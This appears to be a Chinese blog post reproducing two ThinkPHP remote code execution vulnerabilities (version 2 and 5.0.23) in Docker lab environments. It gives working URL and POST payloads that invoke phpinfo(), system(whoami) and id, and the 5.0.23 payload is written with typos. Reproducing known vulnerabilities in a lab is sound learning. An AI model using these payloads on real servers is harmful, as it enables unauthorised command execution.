ThinkPHP 漏洞复现

1.对ThinkPHP2--RCE进行漏洞复现

进入2-rce后运行此靶场 docker-compose up -d 

查看启动环境  docker ps

在浏览器打开IP+端口8080 ,  thinkphp路由的格式是分组/模块/操作名/参数

在url后+/index.php?s=a/a/a/${phpinfo()} ,运行后发现复现成功

中间参数更改为:system(whoami) 我们发现系统发生错误

随后关闭靶场环境

2.

对ThinkPHP5.0.23RCE进行漏洞复现;

运行此靶场 docker-compose up -d

查看启动环境 docker ps

访问网页寻找漏洞点

http://38.6.177.50/:8080/index.php?s=captcha

在ThinkPHP框架中,http://38.66.177.50:8080/index.php?s=captcha 这个URL通常用于访问一个生成验证码图片的页面。这里的URL参数 s=captcha 指定了要执行的模块和操作:

s 通常代表模块(Module)和操作(Action)的组合。在ThinkPHP中,s 参数通常用于路由到特定的控制器方法。
captcha 指的是验证码模块或操作。在ThinkPHP中,captcha 通常是一个内置的功能,用于生成和验证验证码。在ThinkPHP中,我们可以通过配置来定制验证码的样式、字符集、长度等属性。同时,也可以在表单验证时使用这个验证码来确保用户输入的是正确的验证码在Hackber,POST上传

_method= construct&filter[l=system&method=get&serverREQUEST METHOD]=id

随后关闭容器 docker-compose down

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值